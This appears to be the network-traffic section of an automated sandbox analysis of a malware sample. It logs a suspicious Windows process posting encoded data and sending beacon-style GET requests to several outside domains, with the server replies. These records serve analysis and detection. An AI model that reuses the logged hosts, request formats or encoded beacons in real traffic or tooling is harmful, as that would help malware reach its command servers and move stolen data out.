                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 62 57 77 6e 52 54 30 78 72 41 43 4b 69 31 74 48 4b 6a 34 57 68 50 56 6c 56 58 53 75 34 75 47 51 41 76 45 53 58 61 61 61 30 50 67 43 31 52 77 73 70 43 54 6f 55 58 43 53 5a 56 41 2b 75 68 2f 4f 6f 2b 6e 4e 48 59 6b 65 62 36 6f 38 69 74 69 4a 37 33 37 73 55 67 6b 35 56 4f 64 6a 47 39 78 2f 5a 6d 73 74 39 66 36 54 66 55 55 66 33 4c 6b 47 48 59 30 41 59 35 33 52 63 33 61 72 37 44 38 49 72 35 30 42 58 70 41 2b 71 50 66 77 2f 68 56 6b 54 7a 78 66 49 75 61 54 42 73 2b 4c 77 47 79 6a 61 55 2b 47 36 52 66 51 53 6f 34 34 6c 33 49 48 43 66 49 67 58 6c 62 37 37 58 7a 35 46 79 48 64
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kbWwnRT0xrACKi1tHKj4WhPVlVXSu4uGQAvESXaaa0PgC1RwspCToUXCSZVA+uh/Oo+nNHYkeb6o8itiJ737sUgk5VOdjG9x/Zmst9f6TfUUf3LkGHY0AY53Rc3ar7D8Ir50BXpA+qPfw/hVkTzxfIuaTBs+LwGyjaU+G6RfQSo44l3IHCfIgXlb77Xz5FyHd
                                            Timestamp: Jul 3, 2024 18:54:04.029783964 CEST | Bytes transferred: 305 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:03 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 49747 | Destination IP: 64.190.62.22 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:54:05.923355103 CEST | Bytes transferred: 775 | Direction: OUT
                                            POST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.hondamechanic.today/expp/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 64 47 41 6e 42 41 73 78 2f 51 43 4a 74 56 74 48 54 7a 34 53 68 50 5a 6c 56 58 36 2b 34 39 75 51 42 4b 67 53 57 62 61 61 33 50 67 43 6e 78 77 74 33 79 53 6d 55 58 50 74 5a 56 4d 2b 75 67 62 4f 6f 37 62 4e 48 50 77 52 62 71 6f 79 75 4e 69 78 32 58 37 73 55 67 6b 35 56 50 73 47 47 39 70 2f 59 56 30 74 38 39 43 53 57 30 55 59 68 62 6b 47 44 59 30 63 59 35 33 7a 63 32 48 4d 37 42 55 49 72 39 77 42 57 34 41 35 39 66 66 79 67 78 55 34 44 51 49 70 4f 39 37 38 50 61 6d 58 7a 42 4f 6e 66 69 2f 63 6d 69 66 7a 41 34 59 36 6c 31 51 31 43 2f 49 4b 56 6c 6a 37 70 41 2f 65 4b 47 69 2b 4e 78 67 30 7a 2f 72 70 4a 68 74 6f 67 41 66 6e 59 30 6e 49 59 77 3d 3d
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kdGAnBAsx/QCJtVtHTz4ShPZlVX6+49uQBKgSWbaa3PgCnxwt3ySmUXPtZVM+ugbOo7bNHPwRbqoyuNix2X7sUgk5VPsGG9p/YV0t89CSW0UYhbkGDY0cY53zc2HM7BUIr9wBW4A59ffygxU4DQIpO978PamXzBOnfi/cmifzA4Y6l1Q1C/IKVlj7pA/eKGi+Nxg0z/rpJhtogAfnY0nIYw==
                                            Timestamp: Jul 3, 2024 18:54:06.585807085 CEST | Bytes transferred: 305 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:06 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 49748 | Destination IP: 64.190.62.22 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:54:08.449192047 CEST | Bytes transferred: 1788 | Direction: OUT
                                            POST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.hondamechanic.today/expp/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 64 47 41 6e 42 41 73 78 2f 51 43 4a 74 56 74 48 54 7a 34 53 68 50 5a 6c 56 58 36 2b 34 39 32 51 42 38 38 53 57 34 43 61 32 50 67 43 6b 78 77 6f 33 79 54 36 55 58 58 70 5a 55 77 75 75 69 54 4f 72 5a 6a 4e 54 71 4d 52 51 71 6f 79 6d 74 69 4b 37 33 37 35 55 67 31 77 56 50 63 47 47 39 70 2f 59 55 45 74 36 76 36 53 51 30 55 66 33 4c 6b 61 48 59 30 34 59 35 76 43 63 33 7a 32 37 52 30 49 72 64 67 42 55 4f 38 35 69 76 66 38 68 78 55 77 44 52 30 36 4f 39 6e 4b 50 61 36 78 7a 47 6d 6e 63 6e 61 2f 38 7a 62 30 63 6f 55 39 6b 48 31 52 4d 70 56 2b 4e 31 53 48 68 42 48 2f 46 58 65 65 4f 55 41 78 79 66 57 34 65 41 35 64 75 56 4f 6b 59 32 75 61 44 6d 75 47 56 4a 66 49 2b 76 4d 70 41 4c 43 54 63 67 6b 52 6c 34 61 4a 58 49 59 75 32 2f 6c 4b 66 70 32 4f 37 7a 75 69 71 70 35 41 64 4f 72 56 42 41 4c 49 44 36 6a 4c 71 61 58 4c 53 4e 72 66 33 42 58 50 2b 77 54 2b 4a 62 75 6c 78 65 32 62 61 79 34 64 47 38 66 68 76 68 79 4d 74 38 55 67 2b 46 2f 74 62 32 4b 75 32 52 34 67 [TRUNCATED]
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kdGAnBAsx/QCJtVtHTz4ShPZlVX6+492QB88SW4Ca2PgCkxwo3yT6UXXpZUwuuiTOrZjNTqMRQqoymtiK7375Ug1wVPcGG9p/YUEt6v6SQ0Uf3LkaHY04Y5vCc3z27R0IrdgBUO85ivf8hxUwDR06O9nKPa6xzGmncna/8zb0coU9kH1RMpV+N1SHhBH/FXeeOUAxyfW4eA5duVOkY2uaDmuGVJfI+vMpALCTcgkRl4aJXIYu2/lKfp2O7zuiqp5AdOrVBALID6jLqaXLSNrf3BXP+wT+Jbulxe2bay4dG8fhvhyMt8Ug+F/tb2Ku2R4g [TRUNCATED]
                                            Timestamp: Jul 3, 2024 18:54:09.202433109 CEST | Bytes transferred: 305 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:08 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                            Timestamp: Jul 3, 2024 18:54:09.427315950 CEST | Bytes transferred: 305 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:08 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 49749 | Destination IP: 64.190.62.22 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:54:10.979861021 CEST | Bytes transferred: 485 | Direction: OUT
                                            GET /expp/?Z6ZTG=4RP2jfjc/CKkP2k0VFIzhmOcoxlGKDo9u/ZkfjmOk/GcJdogV5u478VHpy4Tx1zZR2PffU9j3QXLxJ/zQp1CY/gImr6l8nbjZW8kbJ4UJqZmHhNvkenHenANmOUPEa0Yb7H7CBE=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.hondamechanic.today
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:11.626230001 CEST | 113 | IN | HTTP/1.1 439
                                            date: Wed, 03 Jul 2024 16:54:11 GMT
                                            content-length: 0
                                            server: Parking/1.0
                                            connection: close


                                            Session ID: 25
                                            Source IP: 192.168.2.6
                                            Source Port: 49750
                                            Destination IP: 23.105.172.12
                                            Destination Port: 80
                                            PID: 5680
                                            Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:16.859086990 CEST | 754 | OUT | POST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=OhJ16vQUvswq5h583Iyfx4aVcwHJsFeA954XI5OIv0yFdXC1tEJ9iAIDqDxJwrFEZdbY7Nvc20LxUEO0WkCd7ekw7239r6esyoyTV1nLoveO31xm1yU9t2tOxhOOIlLWlh65IXcDopzIafwLWXrbDS7a/YeVF+FwzJRUO1m7ZU6IjWK3Vh/y0L4nXcP23KkFbGKwqDfbkimt
                                            Jul 3, 2024 18:54:17.895632029 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=533f06efaad74dc03aa6e60a6ce0ee3f%7C%7C1720198457%7C%7C1720194857%7C%7Ce58761108355481112a576e70ea7b708; expires=Fri, 02-Aug-2024 16:54:17 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=72q7vrf1ctov17qs3optb9pvr5; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip


                                            Session ID: 26
                                            Source IP: 192.168.2.6
                                            Source Port: 49751
                                            Destination IP: 23.105.172.12
                                            Destination Port: 80
                                            PID: 5680
                                            Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:19.402909040 CEST | 778 | OUT | POST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=OhJ16vQUvswq/xJ8wvGfzYaWQQHJjlfH958XI7iYuBqFd3y1uAV9hAIDgjxM+LFPZdX27M/c233xUBq0WTea7Ok22W3/1KesyoyTVxLhovWO3Ehm1XgykWtP4BOOMlLKlh6fIWA9or7IaeALVD/aWC7Qy4eFCfwXqoYNQGO7NiWNrALtJS/RmbYlXeXE3qkvZGyw4UT8rWDO8ez/wonbDoOnJv3RkXj51A==
                                            Jul 3, 2024 18:54:20.505855083 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=70ed71b81025c39171072e3b0ce9172f%7C%7C1720198460%7C%7C1720194860%7C%7C9ca75b6a083e51ae3fd835288ebd32b3; expires=Fri, 02-Aug-2024 16:54:20 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=63p917bqijodufemh90e3p5q8d; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip


                                            Session ID: 27
                                            Source IP: 192.168.2.6
                                            Source Port: 49752
                                            Destination IP: 23.105.172.12
                                            Destination Port: 80
                                            PID: 5680
                                            Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:21.933526993 CEST | 1791 | OUT | POST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG= [TRUNCATED]
                                            Jul 3, 2024 18:54:23.050549984 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=756559287fe03a4415a77fd29eb7083c%7C%7C1720198462%7C%7C1720194862%7C%7C3fd2ead987855aa39d85578e2a4e75dd; expires=Fri, 02-Aug-2024 16:54:22 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=srdaoiq9gdvc81bcuceegectf2; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip


                                            Session ID: 28
                                            Source IP: 192.168.2.6
                                            Source Port: 49753
                                            Destination IP: 23.105.172.12
                                            Destination Port: 80
                                            PID: 5680
                                            Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:24.469583988 CEST | 486 | OUT | GET /hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.primefindsstore.shop
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:25.381266117 CEST | 813 | IN | HTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 0
                                            Connection: close
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=1c4e7a7306f0d02632d76f4d715bcb0d%7C%7C1720198465%7C%7C1720194865%7C%7C58b4abfabd66bd49e0cce7a8633a7e96; expires=Fri, 02-Aug-2024 16:54:25 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=gu2v2lqtpnq0r4oilotonre57s; path=/
                                            Pragma: no-cache
                                            X-Redirect-By: WordPress
                                            Location: http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA=


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            29 | 192.168.2.6 | 49754 | 185.151.30.199 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:38.809283018 CEST | 736 | OUT | POST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=+hREd8eHqBFPty2txifrAqcyxkrH8aCOeItmA26411yOdbgH0nM1zOerj5yGC7Vb3W15Jvo2byT9XuQxP1TjOEXxvZlFfKxjvTW3LodbH9Jj2vvYASdARigMiSXfmtKSSF+IoyoLurdlN3T4wsctUjPcZkcO+dbbcJ0lBxQOVFJMpLEO2U5qlX1L81ltai/268Ts14ak947y
                                            Jul 3, 2024 18:54:39.578632116 CEST | 364 | IN | HTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:39 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            30 | 192.168.2.6 | 49755 | 185.151.30.199 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:41.338901043 CEST | 760 | OUT | POST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=+hREd8eHqBFPrSqt3B3rR6cx+ErHmqCKeIpmAzCo1heOa5IH1l01/uerrZyDNbVu3WpLJvU2byH9XqUxPETiMUXJ7plURqxjvTW3LoI+H7hj2ffYBzdDPygNlSXf3dKWSF+uoz0lupVlN1L4z+0qajPSV0dhvY2tRqBnEHZrEHNss9FUqn5J3HVJ839faC/c48rsnvWDyMeRrlJ9OCPiwtWk1apLqBxN/Q==
                                            Jul 3, 2024 18:54:42.132993937 CEST | 364 | IN | HTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:42 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            31 | 192.168.2.6 | 49756 | 185.151.30.199 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:43.873456001 CEST | 1773 | OUT | POST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:44.660573959 CEST | 364 | IN | HTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:44 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            32 | 192.168.2.6 | 49757 | 185.151.30.199 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:46.405517101 CEST | 480 | OUT | GET /lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.salecost.co.uk
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:47.172274113 CEST | 460 | IN | HTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:37 GMT
                                            content-type: text/html; charset=iso-8859-1
                                            transfer-encoding: chunked
                                            vary: Accept-Encoding
                                            server: Apache
                                            x-origin-cache-status: MISS
                                            x-cdn-cache-status: MISS
